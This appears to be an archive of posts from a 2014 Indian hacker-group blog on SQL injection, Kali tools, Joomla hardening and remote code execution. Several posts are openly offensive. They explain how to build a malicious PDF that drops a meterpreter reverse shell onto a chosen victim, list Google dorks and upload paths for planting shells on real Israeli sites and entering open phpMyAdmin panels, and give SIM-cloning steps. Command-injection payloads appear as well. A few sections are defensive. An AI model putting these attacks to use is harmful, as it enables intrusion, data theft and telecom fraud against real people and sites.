1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big Salute to Our Indian Armies

Freedom is not free. Our Soldiers donate their lives for us

We are Indians and We are Proud to be Indians

India is great, because there is one place in the world where People Respect all Religions.

Kali is a good OS for Hacking

People say this OS is best, that OS is best, but no OS is like Kali Linux.

MOM and DAD

I can't see God, but when I see my MOM and DAD then I think God is there; they are My Gods. Love You MOM DAD.

Thursday, 5 June 2014

SQL Injection types

  1. Boolean Based Blind SQL Injection
    1. For SQLMap, boolean based blind is a technique that involves a lot of HTTP requests and reading the responses character by character, comparing them and detecting the right output.
    2. Once a vulnerable parameter is detected, SQLMap replaces or appends syntactically valid SQL statements for which we can expect some output.
    3. Say there is an original, un-tampered request with a vulnerable parameter that has a certain response, and in the next stage there is a request-response from an injected statement; SQLMap then performs a comparison between these two responses.
    4. The tool uses a bisection algorithm to fetch each character of the output with a maximum of seven HTTP requests, comparing their responses.
    5. Where the output is not within the clear-text plain charset, sqlmap adapts the algorithm with bigger ranges to detect the output.
  2. Time Based Blind SQL Injection
    1. “Time based” itself suggests that there is some comparison on the basis of the time between request and response, made by injecting a syntactically valid SQL statement into the vulnerable parameter.
    2. SQLMap uses SQL statements which put the back-end database on hold for a certain number of seconds before returning.
    3. Using the same technique, i.e. the bisection algorithm, to infer the output character by character, SQLMap compares the response times of various HTTP requests with that of the original request.
  3. Error-Based SQL Injection
    1. The tool uses SQL statements which provoke the target database into generating a database-specific error.
    2. The HTTP response to such a request is then parsed by sqlmap in search of DBMS error messages containing the injected pre-defined chain of characters and, within it, the subquery statement output.
    3. This technique works only when the web application has been configured to disclose back-end database management system error messages.
  4. UNION Query
    1. A syntactically valid SQL statement starting with UNION ALL SELECT is injected into the vulnerable parameter.
    2. UNION query based SQL injection works on the basis of the application behaviour, i.e. when the application passes the output of the SELECT query through a loop or line of statements which allow the output to be printed in the page content.
    3. In case the output is not cycled through any “for loop” or other line of statements, SQLMap uses single-entry UNION query SQL injection.
  5. Stacked Queries
    1. Stacked queries exploitation occurs when an application supports stacked queries. SQLMap adds a semi-colon (;) to the vulnerable parameter value and appends the SQL statement which is to be executed.
    2. Using this technique it is possible to run SQL statements other than SELECT. This is useful for data manipulation, to get system read-write access and finally own the operating system.
  6. Out-of-band
    1. This technique uses a secondary or different communication channel to dump the output of the queries fired on the vulnerable application.
    2. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker's domain.
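Each of the six techniques above leaves its own trace in a web server's access log. As an added example (not part of the original post), the Python below classifies the query-string values of Apache combined-format log lines against heuristic signatures for each technique and counts probes per client and parameter; a burst of boolean or time-based hits on one parameter from one client is the fingerprint of the character-by-character inference described above. The log lines and signatures are constructed for illustration and are a starting point, not a complete ruleset.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Heuristic signatures for the six sqlmap techniques listed above. The first
# match wins, so the more specific patterns are tried before the generic ones.
TECHNIQUE_PATTERNS = [
    ("stacked queries",
     re.compile(r";\s*(select|insert|update|delete|drop|exec|declare|waitfor)\b", re.I)),
    ("time-based blind",
     re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("union query",
     re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("out-of-band",
     re.compile(r"\b(load_file|utl_http\.request|utl_inaddr\.get_host_address|xp_dirtree)\s*\(", re.I)),
    ("error-based",
     re.compile(r"\b(extractvalue|updatexml)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind",
     re.compile(r"\b(and|or)\b\s+[^;&|]{0,60}?(=|<>|!=|<|>)\s*['\"]?\w", re.I)),
]

# One Apache "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one ordinary request, then a burst of probes against
# the same parameter from one client, the way the blind techniques walk a value.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2014:10:00:01 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2014:10:00:02 +0000] "GET /item.php?id=7%20AND%201%3D1 HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2014:10:00:02 +0000] "GET /item.php?id=7%20AND%201%3D2 HTTP/1.1" 200 388
10.0.0.9 - - [05/Jun/2014:10:00:03 +0000] "GET /item.php?id=7%20AND%20ascii(substr(version(),1,1))%3E52 HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2014:10:00:04 +0000] "GET /item.php?id=7%20AND%20SLEEP(5) HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2014:10:00:05 +0000] "GET /item.php?id=7%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 900
10.0.0.9 - - [05/Jun/2014:10:00:06 +0000] "GET /item.php?id=7%3B%20DROP%20TABLE%20t HTTP/1.1" 500 100
"""


def classify(value):
    """Name the injection technique a decoded parameter value resembles, or None."""
    for name, pattern in TECHNIQUE_PATTERNS:
        if pattern.search(value):
            return name
    return None


def parse_line(line):
    """Split one log line into (ip, status, [(param, decoded value), ...]) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qsl percent-decodes and turns '+' into ' ', giving the value as the
    # application (and the database) would have seen it.
    params = parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True)
    return m.group("ip"), int(m.group("status")), params


def scan_log(lines):
    """Return one finding per suspicious parameter: (ip, param, technique, status)."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, status, params = parsed
        for name, value in params:
            technique = classify(value)
            if technique is not None:
                findings.append((ip, name, technique, status))
    return findings


def summarize(findings):
    """Count findings per (ip, param, technique). A high count on one of the two
    blind techniques is the signature of character-by-character inference, which
    needs up to seven requests per character according to the list above."""
    return Counter((ip, param, technique) for ip, param, technique, _ in findings)


if __name__ == "__main__":
    for key, n in sorted(summarize(scan_log(SAMPLE_LOG.splitlines())).items()):
        print("%s param=%s technique=%s hits=%d" % (key[0], key[1], key[2], n))
```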

Wednesday, 28 May 2014

Top 10 Sql Injection tools

10 Powerful SQL Injection Tools That Penetration Testers Can Use
1. BSQL Hacker
This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.
Download: http://flexydrive.com/q75te2c2banl
2. The Mole
This is an SQL Injection tool that uses the union technique or the boolean query-based technique.
Download: http://flexydrive.com/3pr6tjhb0b8p
3. Pangolin
This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.
Download: http://flexydrive.com/i6sq1d5i6ysd
4. Sqlmap
This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.
Download: http://flexydrive.com/yrc3szqgr9i0
5. Havij
This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.
Download: http://flexydrive.com/t2j5ymthhlss
6. Enema SQLi
This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.
Download: http://flexydrive.com/qyxp8tk2m85z
7. Sqlninja
This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.
Download: http://flexydrive.com/2wp50o3ojbii
8. sqlsus
Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.
Download: http://flexydrive.com/tyn0mmznl7e5
9. Safe3 SQL Injector
This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.
Download: http://flexydrive.com/6rl4s64fug7i
10. SQL Poizon
This tool includes php , asp , rfi , lf dorks that can be used for penetration testing.
Download: http://flexydrive.com/o29h5b7p5221

Thursday, 8 May 2014

How to add Workspace In Metasploit kali linux

Jai Hind I am DeadManINDIA from (IHT) 1ND14N H4X0R5 T34M

We are :- EagleShadow,Null_Port_Govind,Mr.R@66!T,Haxor-Rahul,Spy-Hunter,Grey-Noob,Karate-Katrina.

Love to :- My Mom And My Dad.

Today we will discuss how to add a workspace in Metasploit in Kali Linux.
Let's go


Step 1 :- First of all, start the database and Metasploit services with the help of these commands.
 1st :- service postgresql start
2nd :- service metasploit start

Step 2 :- Now run Metasploit with this command.
syntax:- msfconsole
Step 3 :- Now we use this command to add the workspace in Metasploit.
syntax:- workspace -a <workspace name>

Here -a means add the workspace and <workspace name> is the name of the workspace.

In my case I add the IHT workspace here.

Now the most important thing: use the -h option to see the help,
like this
#workspace -h


Thanks for reading
          Jai Hind Jai Bharat 

 

#HOW_TO_CHANGE_NAME_OF_A_FACEBOOK_FANPAGE_AFTER_200_LIKES:

As we know, we can't change the page name after 200 likes. This means you are only able to change the page name before the page reaches 200 likes; after that the option disappears and the page name is fixed. In that condition, suppose your page has 10,000+ or 200+ likes but you decide to change your business name; then it is a great problem because there is no possible way to change it.
►Steps For Changing Page Name:
1. Open Google Chrome Browser
2. Go to Settings
3. Show Advanced Settings
4. Change Proxy, set IP
5. 212.138.92.17 port 8080
6. Restart Your Browser
7. Open Page
8. Update Page Info
9. Translated Name
10. Right Click on Arabic and Inspect Element
11. Change Arabic to
<tr class="_1hoi dataRow"><th class="label">English:</th><td class="data"><input type="text" class="inputtext" name="en_XX"></td></tr>
12. Now English will appear in place of Arabic; write the new name and press save.
13. Name Changed. That's All

Tuesday, 6 May 2014

101 Top Tools For System And Network Admins!


Are you a system administrator? If yes, then these tools will come in handy for you!   
Monday, March 24, 2014 System and network admins need a variety of tools to work with. These tools are available in numbers, which makes it hard to sort out the best from the rest. Here's help!

System and Network Analysis: As an administrator, it is your job to monitor the system and network that you are presiding over. Analysis is an important part of being in the know of what's happening and when a particular action is required. That is where system and network analysis tools come in handy.

1. NTFS Permissions Explorer

2. Xirrus Wi-Fi Inspector

3. Whois

4. ShareEnum

5. PipeList

6. TcpView

7. The Dude

8. Microsoft Baseline Security Analyzer

9. WireShark

10. Look@LAN

11. RogueScanner

12. Capsa Free Network Analyzer

13. SuperScan

14. Blast

15. UDPFlood

16. IPplan

17. NetStumbler

18. PingPlotter

19. SolarWinds Free Permissions Analyzer for AD

20. Angry IP Scanner

21. FreePortMonitor

22. WirelessNetView

23. BluetoothView

24. Vision

25. Attacker

26. Total Network Monitor

27. IIS Logfile Analyser

28. ntop

System testing and troubleshooting: What's the next logical step after analysing your network? Of course, testing whether your analysis was right or wrong. To put it more clearly, as a system or network admin, it is one of your jobs to perform tests on your domain. These are the tools that let you do that.

29. Pinkie

30. VMWare Player

31. Oracle VirtualBox

32. ADInsight

33. Process Monitor

34. SpiceWorks Network Troubleshooting

35. RAMMap

36. Autoruns

37. LogFusion

38. Microsoft Log Parser

39. AppCrashView

40. RootKitRevealer

System and network management: These are tools that allow you to manage the network or system. In a way, they comprise various tools that help an IT professional manage a bunch of tasks or certain specific tasks.

41. Bitcricket IP Subnet Calculator

42. EMCO Remote Installer Starter

43. ManagePC

44. Pandora FMS

45. SNARE Audit and EventLog Management

46. OCS Inventory

47. Zenoss Core – Enterprise IT Monitoring

48. Unipress Free Help Desk

49. SysAidIT Free Help Desk

50. Cyberx Password Generator Pro

System and Network Management: These are tools that allow you to manage the network or system. In a way, they comprise various tools that help an IT professional manage a bunch of tasks or certain specific tasks.

51. KeePass Password Safe

52. TweakUAC

53. Microsoft Application Compatibility Toolkit

54. ExtraSpy Employee Monitor

55. NetWrix USB Blocker Freeware

56. FileZilla

57. Wake On Lan 2 .NET

58. Speccy

59. Active Directory Explorer (ADExplorer)

60. ADRestore

File and disk management: These are tools that allow you to perform various operations on your files. These include operations like de-duplication, copying, file comparison, merging, encryption, syncing, searching and renaming of files. These tools can be invaluable additions to your arsenal as a system administrator.

61. Disk2vhd

62. Defraggler

63. PageDefrag

64. PsPad

65. MD5Summer

66. Universal Viewer

67. FreeCommander

68. Recuva

69. Steganos LockNote

70. Microsoft SyncToy

71. 7-Zip

72. PeaZip

73. Bacula

74. Areca Backup

75. DirSync Pro

76. Amanda Network Backup

77. WebSynchronizer

78. KGB Archiver

79. Iometer

80. Notepad++

Performance and availability monitoring: These tools allow you to monitor your system and network performance and monitor them for possible errors etc. They provide functions such as monitoring of memory utilisation, network utilisation, disk utilisation, CPU utilisation etc. In addition, you can also use the network monitoring tools in order to ensure that your network is performing at its optimal levels and is stable.

81. ManageEngine Free HyperV Performance Monitor

82. Nagios

83. ManageEngine Free Exchange Health Monitor

84. Kratos Exchange Monitor

85. ManageEngine Free Windows Health Monitor

86. ManageEngine Free Ping Tool

87. ManageEngine Free SQL Health Monitor Tool

88. ManageEngine Free VM Configuration Tool

89. Kratos Network Device Monitor

90. IxChariot QCheck

91. EasyNetMonitor

Remote management: As a system or network admin, you will be dealing with a lot of remote connections and clients. In order to manage this task efficiently, you need tools like the ones mentioned below. You can use them to remotely administer clients and servers, manage remote desktop sessions and various other functions.

92. Remote Desktop Manager

93. TightVNC

94. Microsoft RDCMan

95. Terminals

96. PsFile

All-in-one toolkits: Sometimes you do not want to use different tools for different purposes. You want tools that can manage multiple functionalities by themselves so that you don't have to switch over to a new one whenever your attention is needed in a new direction. These are all-in-one kits that fill up some of the gaps that exist in this respect.

97. Net Tools 5.0

98. ManageEngine Free Windows Tools 2

99. Axence NetTools Pro

100. Free IP Tools

101. PsTools

Tuesday, 29 April 2014

How to use Plecost Tool for scanning wordpress sites

Jai Hind friends I am DeadManINDIA From IHT(1ND14N H4X0R5 T34M).

We are :- Null_Port_Govind,Haxor-Rahul,EagleShadow,Spy-Hunter,Grey-Noob,
                Mr.R@66!T,Karate-Katrina.
Love to :- My Mother,My Father .

Today I'm going to explain how to scan a WordPress website with the help of Plecost in Kali Linux.

Steps :-
1 Change the directory like this and come into the plecost directory
     /usr/share/plecost/
Syntax  :- cd /usr/share/plecost/

2 Now check the contents of the directory; here you find wp_plugin_list.txt,
 the list of WordPress plugins.

3 Final step: we run this command to start the scan
Syntax:-   plecost -i wp_plugin_list.txt <url of site>


Try the different options in this tool; please read the manual, try those options and enjoy.

Thanks for reading give your feedback on Facebook or Skype
FB =====>>>> DeadManINDIA
Skype======>DeadManINDIA1
                                                  Jai Hind Jai Bharat

Monday, 28 April 2014

How to Use BlindElephant tool in kali linux

Jai Hind Friends, I am DeadManINDIA. As you know, today I'm going to explain how we use the BlindElephant.py tool in Kali Linux.

Greetz To :- Null_Port_Govind,EagleShadow,Haxor Rahul,Mr.R@66!T,Grey-Noob,Spy-Hunter,Karate-Katrina,IndiWar,X-MAN-INDIA,Satish Choudhary ,Mahi Di.

Love to ----->>>>My Mother And My Father.

So let's Start :- 
 1 Open Terminal and type BlindElephant.py like this
2 Read the options carefully and then take the next step.
3 Then use this command
Syntax:- BlindElephant.py <site url> <type of site>
Here we type or paste the URL of the site in place of <site url> and
the type of site, like wordpress, joomla or other, depending on what kind of site you are going to scan.
See, in my case I use it like this
And at the end you find your result.

Thanks for reading give your feedback on Facebook Or Skype
FB = DeadManINDIA
Skype= DeadmanINDIA1
                                               Jai Hind 
                                             Jai Bharat

Thursday, 24 April 2014

How to add plugin in OllyDbugger kali linux

Hello Friends, I'm DeadManINDIA From 1ND14N H4X0R5 T34M (IHT)
                                       JAI HIND
                               JAI BHARAT
 

Love to :- My Father,My Mother, Eagleshadow,Mr.R@66!T,Null_Port-Goving,Grey-Noob,Karate-Katrina,Spy-Hunter,Haxor-Rahul.

Lets Start :- 

What I am Doing ?
I will explain here how to add Hide Debugger 1.2.4 to OllyDbg in Kali Linux.

Steps :-
1 First of all download Hide Debugger from here


2 Now uncompress the file with the help of this command (the file name contains spaces, so quote it).
    Syntax:- unrar x "Hide Debugger v1.2.4.rar"

  3 In my case I uncompressed the rar file on my desktop. Now we open the directory and copy the files which I show in the image.
4 Now we paste these files in the OllyDbg directory
   Open /usr/share/ollydbg/
And paste here all the files which you copied.

Now start OllyDbg, then you find the Hide Debugger plugin under Plugins.


JAI HIND FRIENDS I HOPE YOU ENJOY TUT IF ANY PROBLEM THEN TELL ME ON FB OR SKYPE
FB = DeadManINDIA
Skype = deadmanindia1

Friday, 18 April 2014

Adobe PDF Embedded EXE Social Engineering exploit

 

Lets Begin :1) Prepare a .pdf file that you wish to embed within the malicious file. This file will greet the target when he executes the malicious file. So pick something related to the theme of his job, for example if he is a doctor then send him some medical bullshit .pdf you find on the net.

2) Load up msfconsole and type : search pdf embed


3) You know the drill, for more information on the exploit type : info exploit/windows/....../....../....../

4) Read through the description section

5) Type : use exploit/windows/fileformat/..../...../

6) Its time to pick a desirable payload for your scenario, type show payloads

7) I have chosen the common windows/meterpreter/reverse_tcp

8) Once you have made your payload choice, lets prepare with setting up the exploit.

a) set PAYLOAD (choice of payload)
b) set LHOST (your IP)
c) set LPORT 4444 (by default)
d) set FILENAME ( give your malicious .pdf a name)
e) set INFILENAME (provide the .PDF you prepared to embed, refer to point

9) And finally type, exploit.

10) As shown in the example below, the new malicious file has been created and is stored in my root/.msf4/local folder

11) So when the victim executes urgent.pdf, he will be greeted with the .pdf file we declared during our set INFILENAME option. But behind the scenes, our payload gets executed.

12) There we go, satan is sitting right there.

13) All that is left for us to do now is to set up our multi handler.

14) As shown in the image below.
a) set PAYLOAD (Must use the same payload as the one you used on your victim)
b) set LHOST (Your ip)
c) set PORT 4444 ( By Default)

Sunday, 13 April 2014

PhpmyAdmin Exploit with Google Dorks



Hello Reader! Today I'm going to show you how to exploit phpMyAdmin with Google Dorks. You don't need to do anything, no login, nothing; just put in the dork and open any site and you will go directly to phpMyAdmin :).. So let's Start...


Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 results. So now you can guess how many vulnerable sites are there :D.. Open any site and you will be redirected to phpMyAdmin...:D

This dork bypasses the admin username and password and takes you directly to the information_schema tables to get data, and you can delete data

Saturday, 12 April 2014

Secure Joomla sites

Security of Joomla Website by Htaccess
Htaccess is a configuration file for web servers that run Apache as their server software. It is a very powerful configuration file which can control the server. Htaccess is a hidden file which should already be present in the root directory of your server. If it’s not, then you can create it, but make sure that the right name of the file is “.htaccess” (yes, it starts with a dot). Since we can do so many things with the help of .htaccess, in this section I will discuss the security aspect of an .htaccess file for Joomla.
You can protect the administrative area using different techniques. For example, you can restrict it based on the IP address (in this case you’d need to create an .htaccess file on the administrator directory):

order deny,allow
allow from 116.71.18.189
deny from all

Remember, if your ISP uses dynamic IP addresses, then it is not a good idea to use this technique since your IP address might change at any given time. To prevent directory listing (because an attacker may read important files off the server, and a directory listing always helps a hacker learn about the security practices of a website), you can write the code below into the .htaccess file which is present in your root:

IndexIgnore *
Options -Indexes

Another best practice is to disable the server signature because it gives an idea about the web server software and the version of the software. To do this, add this line in the .htaccess file to disable the server signature:

ServerSignature Off

Another important step is to secure the .htaccess file itself so that nobody can read it on the browser. To do this, you need to add these lines on the .htaccess file:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Configuration.php is a very important file because it contains information about the database of the website and other relevant information. So you need to secure the configuration.php file by utilizing the .htaccess file:

<FilesMatch "configuration\.php">
Order allow,deny
Deny from all
</FilesMatch>
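To check that a given .htaccess actually applies the four hardening steps above, here is an added Python audit script (not part of the original post). It parses the file text, looks for `Options -Indexes` and `ServerSignature Off`, and checks that a `<Files>` or `<FilesMatch>` container covering `.htaccess` and `configuration.php` denies everyone, accepting both the Apache 2.2 `Order`/`Deny from all` form used above and the Apache 2.4 `Require all denied` form; the two sample .htaccess texts are constructed, and the audit is purely textual, so it cannot tell whether `mod_access_compat` is loaded on a 2.4 server or whether `AllowOverride` lets the file take effect at all.

```python
import re

# Constructed sample 1: the directives recommended above, gathered into one
# root .htaccess in the Apache 2.2 Order/Deny syntax the section uses.
HARDENED = """\
IndexIgnore *
Options -Indexes
ServerSignature Off
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "configuration\\.php">
Order allow,deny
Deny from all
</FilesMatch>
"""

# Constructed sample 2: listing and signature left on, and configuration.php
# merely IP-restricted (the administrator-directory rule above), not denied.
WEAK = """\
Options +Indexes +FollowSymLinks
ServerSignature On
<Files configuration.php>
order deny,allow
allow from 116.71.18.189
deny from all
</Files>
"""

OPTIONS_RE = re.compile(r"^\s*Options\b[^\n]*\s-Indexes\b", re.I | re.M)
SIGNATURE_RE = re.compile(r"^\s*ServerSignature\s+Off\s*$", re.I | re.M)
CONTAINER_RE = re.compile(
    r'<(?P<kind>Files|FilesMatch)\s+"?(?P<arg>[^">]+?)"?\s*>(?P<body>.*?)</(?P=kind)>',
    re.I | re.S,
)
# Apache 2.2 "Deny from all" or its 2.4 equivalent "Require all denied".
DENY_ALL_RE = re.compile(r"^\s*(Deny\s+from\s+all|Require\s+all\s+denied)\s*$", re.I | re.M)
# Any line that re-admits some clients turns a deny-all into a mere restriction.
ALLOW_RE = re.compile(r"^\s*(Allow\s+from|Require\s+(ip|host|all\s+granted))\b", re.I | re.M)


def strip_comments(text):
    """Drop '#' comment lines so a commented-out directive does not count."""
    return "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("#"))


def denies_everyone(body):
    """True when a container body blocks all clients: a deny-all line and no
    Allow/Require line that lets anyone back in."""
    return bool(DENY_ALL_RE.search(body)) and not ALLOW_RE.search(body)


def file_is_blocked(text, filename):
    """True if some <Files>/<FilesMatch> container covering filename denies everyone."""
    for m in CONTAINER_RE.finditer(text):
        arg = m.group("arg")
        if m.group("kind").lower() == "files":
            covered = arg == filename
        else:
            try:
                covered = re.search(arg, filename) is not None
            except re.error:
                covered = False
        if covered and denies_everyone(m.group("body")):
            return True
    return False


def audit_htaccess(text):
    """Map each hardening step from the section above to whether text applies it."""
    text = strip_comments(text)
    return {
        "directory listing disabled": bool(OPTIONS_RE.search(text)),
        "server signature off": bool(SIGNATURE_RE.search(text)),
        ".htaccess blocked": file_is_blocked(text, ".htaccess"),
        "configuration.php blocked": file_is_blocked(text, "configuration.php"),
    }


def missing_steps(text):
    """Names of the steps a given .htaccess still lacks, in the section's order."""
    return [name for name, ok in audit_htaccess(text).items() if not ok]


if __name__ == "__main__":
    for label, sample in (("hardened", HARDENED), ("weak", WEAK)):
        print(label, "missing:", missing_steps(sample) or "nothing")
```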

Since there are various security risks associated with the configuration.php file, it is not enough to simply make the adjustments above. For maximum security, you need to move configuration.php outside public_html. But how to do this? If you simply move the configuration.php file, then your website might crash.
How to Move configuration.php Outside public_html in Joomla
Below is a tutorial that has been tested on Joomla 1.5 to move the configuration.php file outside public_html.
In the first step, you need to create a directory in your home directory (outside public_html). Suppose the directory name is irfan:

Download and make a backup of configuration.php.
Delete the current configuration.php from the Joomla folder (from public_html). Remember, when you delete it your website might crash and the error will read:

Go to the folder that was created in the first step.
Upload configuration.php into that folder.
Open the Joomla file includes/defines.php and replace the line:

define('JPATH_CONFIGURATION', JPATH_ROOT);

with:

define('JPATH_CONFIGURATION', JPATH_ROOT.DS.'../rootfoldername');

If Joomla is in a subdirectory, then replace it with:

define('JPATH_CONFIGURATION', JPATH_ROOT.DS.'../../'.DS.'rootfoldername');

(it is case sensitive, so be sure to use proper caps).

Remember, rootfoldername is the name of the folder that we created in the first step (which is irfan in this case study).
Repeat the same step for administrator/includes/defines.php.
Now the website is ready and secure.

Conclusion
Since the Internet is not a very safe place, you need to take a personal interest in the security of your website. So if you’re using the Joomla platform, be sure to implement the best security practices available, if you want to remain secure.

HEART BLEED TOOLS (OPEN SSL)

CHECKER:
ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
SSL Server Test :
Metasploit Module: 
Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: 
Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas 
Heartbleeder: Tests your servers for OpenSSL:
Heartbleed Attack POC and Mass Scanner:
Heartbleed Honeypot Script: 
http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Tuesday, 8 April 2014

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guys.. Today I found some FRESH private Israel 0day exploits, so I thought of sharing them with you all.... So let's Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

Tuesday, 25 March 2014

Sim-Cloning tut

1. Buy a Sim card Reader
2.Need a Blank sim card or super sim card
3.Download Magicsim at http://www.magicsim.com/en/multi-sim.asp? new_id=6
4. Download http://www.filecart.com/Windows/System-Utilities/Backup-Restore/USB-SIM-Card-Reader- Software_1711_1.html
5. Install programs.
6. Go into phone tools, select sim card, then select unlock sim; it will prompt for a code.
7 call network provider, they will ask for your phone number, your account info, name and security code,
then they will ask why you want to unlock your simcard, just tell them you need to unlock your sim to get it
to work with your overseas phone or something.
8. Once they give you the sim unlock code, enter it, and it will say sim unlocked.
9. remove the sim from your phone, place it in the cardreader, click read from card in magic sim program.
10. Once it says connected, select crack sim in the toolbar. Click strong ki and click all of the other find options and then click start.
11. Once your ki is found and the crack is finished, click file, save as and save your cracked sim info to a file.
12. IMPORTANT!!! You must click disconnect from the file menu or you will ruin your sim card. Once it says
disconnected, remove the sim, put it in your phone and see if it still works; it should. If not, you either did not unlock your sim, or you tried to copy it instead of crack and save.
13. Insert the blank 3G card. Use the other program, not magic sim, at this point.
14. click connect
15. it will say no info found if it is truly blank.
16. Select write to sim; it will prompt you to select a dat file. Select the one you saved before, now click start. It will take about 10 minutes to write it; once it is complete, it will ask for a security code. Enter the security code the network provider gave you, then click finish.
17. Your card is cloned. If you try to make 2 calls at the same time, one will go through, the other will say call failed, and both phones will get the same messages, text and voice, and both will receive the same calls, but only one can talk at a time.

Remote Code Execution (RCE)

I'm going to demonstrate the Remote Code Execution vulnerability.

The main cause of this vulnerability is taking unfiltered user input as part of a command that will be executed.
Injection vulnerabilities (SQL, XPath, LDAP etc.) can be classified as RCE vulnerabilities.

For example, our source code will be like this:

PHP Code:
<html>
<a href="?cmd=echo %TIME%">View Time</a><br>
<?php if (isset($_GET['cmd'])) print "<b>Current Time: </b> " . shell_exec($_GET['cmd']); ?>
</html>

As you can see, our page is executing a MS-DOS command to view the current time.
Note: This is not necessary actually. We can simply use the date() function of Php to view the current time.

Back to our subject. There is a parameter named "cmd" that takes its value via GET method. As you can guess, we can manipulate that parameter and execute any MS-DOS command we like.


We just gathered information about the BIOS. Imagine how much you can do with this vulnerability if the user had full access.

(07-05-2013 02:32 AM)The Alchemist Wrote:  Another form of this vulnerability can be :
Code:
<form action="add.php" method="post">
<textarea rows="20" cols="30" name="text"></textarea>
<input type="submit" value="Submit" name="sub"/>
</form>

add.php :
PHP Code:
<?php
if (!empty($_POST['text'])) {
    $hand = fopen("some.php", "a");
    fwrite($hand, $_POST['text']);
    fclose($hand);
}
?>

And when someone executes some.php.....

Another example:
Code:
<form action="#" method="POST">
<b>Enter your name:</b><br>
<input type="text" name="name"><br>
<input type="submit" value="Send"><br>
<br>
</form>
<?php
if(!empty($_POST['name'])){
$filename = "some.shtml";
$file = fopen($filename, 'w') or die ("File couldn't opened!");
$text = "Hello ".$_POST['name']."!";
fwrite($file, $text);
fclose($file);
print '<a href="some.shtml">Click Here To Go!</a>';
}
?>

If you put an SSI command in the name field, it'll be saved to some.shtml and will be executed when you open it.

More example;
(07-05-2013 08:54 PM)shp0ngl3 Wrote:  This is a nifty little vuln with a possibly severe outcome if in the wrong hands. I've seen several ping services that are vulnerable to this.

I've seen code similar to this
Code:
<?php
$target = $_POST['target'];
exec("ping {$target}", $output);
foreach ($output as $line) {
    echo "{$line}<br />\n";
}

So, executing commands is as easy as in your own terminal
Code:
-c 0 google.com;ls -la /
or
Code:
-c 1 google.com && ls -la /

This is the logic of Remote Code Execution. To avoid this vulnerability, don't use user input in commands that will be executed. If you have to use it, check and filter it properly.

I hope you'll like this tutorial
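The ping service quoted above is the clearest case, and the fix is to never hand user input to a shell at all. As an added example (not the thread's own code, and in Python rather than the PHP shown), the functions below validate the target against an allowlist of hostname and IP syntax and then build the ping command as an argv list for subprocess, so a value like the `-c 0 google.com;ls -la /` payload from the thread is rejected before anything runs; the ping flags and count limit are assumptions for the example.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits and hyphens, not starting or ending with '-'.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_target(target):
    """Allowlist check: accept only an IP literal or a syntactically valid hostname.
    Anything else (spaces, ';', '&&', '|', a leading '-') is rejected outright
    rather than escaped, so there is nothing for a shell or ping to misread."""
    if not target or len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    labels = target.rstrip(".").split(".")
    return all(LABEL_RE.match(label) for label in labels)


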